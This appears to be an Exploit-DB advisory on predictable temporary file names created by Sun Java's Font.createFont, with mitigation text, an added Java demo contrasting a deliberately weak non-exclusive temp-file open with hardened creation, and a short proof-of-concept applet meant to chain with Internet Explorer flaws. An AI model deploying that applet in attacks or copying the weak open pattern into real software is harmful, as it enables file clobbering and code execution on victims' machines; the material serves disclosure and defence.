Vendor: Java Virtual Machine
By: Not specified
CVSS: 7.5 (HIGH)
CWE: 377 (Insecure Temporary File Creation)
Product Name: Java Virtual Machine
Affected Version From: Not specified
Affected Version To: Not specified
Patch Exists: NO
Related CWE: Not specified
CPE: a:sun:java_virtual_machine
Metasploit:
Other Scripts:
Platforms Tested: Unix, Linux, and Microsoft platforms

Insecure Temporary File Creation in Sun Java Virtual Machine

The Sun Java Virtual Machine is prone to an insecure temporary file creation weakness. The issue is caused by the 'Font.createFont' method creating a temporary file with a predictable name. This vulnerability can be exploited in combination with other vulnerabilities in Internet Explorer to execute arbitrary code on a vulnerable computer.

Mitigation:

It is recommended to apply the latest patches and updates from the vendor to address this vulnerability. Additionally, users should exercise caution when visiting untrusted websites and avoid downloading files from untrusted sources.
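The weakness named above is the combination of a guessable file name with a non-exclusive open in a directory that other local users can write to. The Java program below is an added example, not code from the advisory, from Sun, or from the applet reproduced under "Exploit-DB raw data": it models the "+~JFxxxxx.tmp" naming with hypothetical weakCreate and strictCreate helpers, shows that the same name opened with CREATE_NEW fails safely when a file already occupies it, uses the standard Files.createTempFile API for the hardened form, and adds a small directory check a reviewer can run. The temp directory and the pre-planted file are constructed for the demo.

```java
import java.io.IOException;
import java.nio.channels.FileChannel;
import java.nio.charset.StandardCharsets;
import java.nio.file.DirectoryStream;
import java.nio.file.FileAlreadyExistsException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.StandardOpenOption;
import java.nio.file.attribute.FileAttribute;
import java.nio.file.attribute.PosixFilePermission;
import java.nio.file.attribute.PosixFilePermissions;
import java.util.Set;

// Added example, not the advisory's or Sun's code: weak vs. hardened temp files.
public class TempFileDemo {

    // Name modelled on the "+~JFxxxxx.tmp" scheme the advisory describes. A
    // five-digit number gives at most 100 000 candidates, so anyone with write
    // access to the directory can pre-create every one of them in advance.
    static String predictableName(int n) {
        return String.format("+~JF%05d.tmp", n);
    }

    // Weak (hypothetical helper): CREATE without CREATE_NEW reuses whatever
    // already sits under that name, including a symlink planted by another
    // local user, and TRUNCATE_EXISTING then clobbers its target.
    static Path weakCreate(Path dir, int n) throws IOException {
        Path p = dir.resolve(predictableName(n));
        try (FileChannel ch = FileChannel.open(p, StandardOpenOption.CREATE,
                StandardOpenOption.WRITE, StandardOpenOption.TRUNCATE_EXISTING)) {
            // body left empty: the open itself is the problem
        }
        return p;
    }

    // Same name, but CREATE_NEW asks the OS for O_CREAT|O_EXCL semantics: the
    // open fails atomically if anything already exists at that path.
    static Path strictCreate(Path dir, int n) throws IOException {
        Path p = dir.resolve(predictableName(n));
        try (FileChannel ch = FileChannel.open(p, StandardOpenOption.CREATE_NEW,
                StandardOpenOption.WRITE)) {
            // nothing to write for the demo
        }
        return p;
    }

    // Hardened: let the JDK pick an unguessable name, create it exclusively
    // and, where the file system supports it, request owner-only permissions
    // at creation time so there is no window with a world-readable file.
    static Path safeCreate(Path dir) throws IOException {
        if (dir.getFileSystem().supportedFileAttributeViews().contains("posix")) {
            Set<PosixFilePermission> ownerOnly = PosixFilePermissions.fromString("rw-------");
            FileAttribute<Set<PosixFilePermission>> attr =
                    PosixFilePermissions.asFileAttribute(ownerOnly);
            return Files.createTempFile(dir, "font-", ".tmp", attr);
        }
        return Files.createTempFile(dir, "font-", ".tmp");
    }

    // Defensive check: count files in a shared temp directory that match the
    // predictable pattern. Leftovers, or a suspiciously complete set of names,
    // are worth a look during an incident review.
    static long countPredictableNames(Path dir) throws IOException {
        long n = 0;
        try (DirectoryStream<Path> ds = Files.newDirectoryStream(dir, "+~JF*.tmp")) {
            for (Path ignored : ds) {
                n++;
            }
        }
        return n;
    }

    public static void main(String[] args) throws IOException {
        Path dir = Files.createTempDirectory("tmpdemo-");

        // Constructed for the demo: a file that already occupies a predictable name.
        Path planted = dir.resolve(predictableName(42));
        Files.write(planted, "planted by someone else".getBytes(StandardCharsets.UTF_8));

        Path weak = weakCreate(dir, 42);
        System.out.println("weak:   silently reused " + weak.getFileName()
                + ", size now " + Files.size(weak) + " bytes (was 23)");

        try {
            strictCreate(dir, 42);
            System.out.println("strict: unexpectedly succeeded");
        } catch (FileAlreadyExistsException e) {
            System.out.println("strict: refused existing " + e.getFile());
        }

        Path safe = safeCreate(dir);
        System.out.println("safe:   created " + safe.getFileName());

        System.out.println("predictable names in " + dir + ": " + countPredictableNames(dir));
    }
}
```

Compile and run with `javac TempFileDemo.java && java TempFileDemo`. The weak helper truncates the planted file without complaint, the strict variant throws FileAlreadyExistsException for the same name, and the hardened variant returns a fresh name with a 64-bit random component that the JDK chose and created exclusively; the directory check reports the one planted name.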
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10685/info

Sun Java Virtual Machine is a component of the Sun Java infrastructure that performs the handling of Java applets and other programs. It is available for Unix, Linux, and Microsoft platforms. 

Sun Java Virtual Machine is prone to an insecure temporary file creation weakness. It is reported that this file is created by the 'Font.createFont' method with the following name:

+~JFxxxxx.tmp

where xxxxx is a random number.

This issue can be combined with various other vulnerabilities in Internet Explorer to ultimately allow for code execution on a vulnerable computer.

    import java.applet.Applet;
    import java.awt.Font;
    import java.net.URL;
    import netscape.javascript.JSObject;

    public class Jelmer extends Applet {

        public void init() {
            // Feeding an externally supplied font stream to Font.createFont
            // triggers the predictable "+~JFxxxxx.tmp" temporary file described above.
            try {
                Font f = Font.createFont(Font.TRUETYPE_FONT,
                        new URL(getParameter("infile")).openStream());
            } catch (Exception ignored) {}

            // Notify the hosting page via LiveConnect that the font has been processed.
            try {
                JSObject jsWin = JSObject.getWindow(this);
                jsWin.call("doneloading", new Object[]{});
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
    }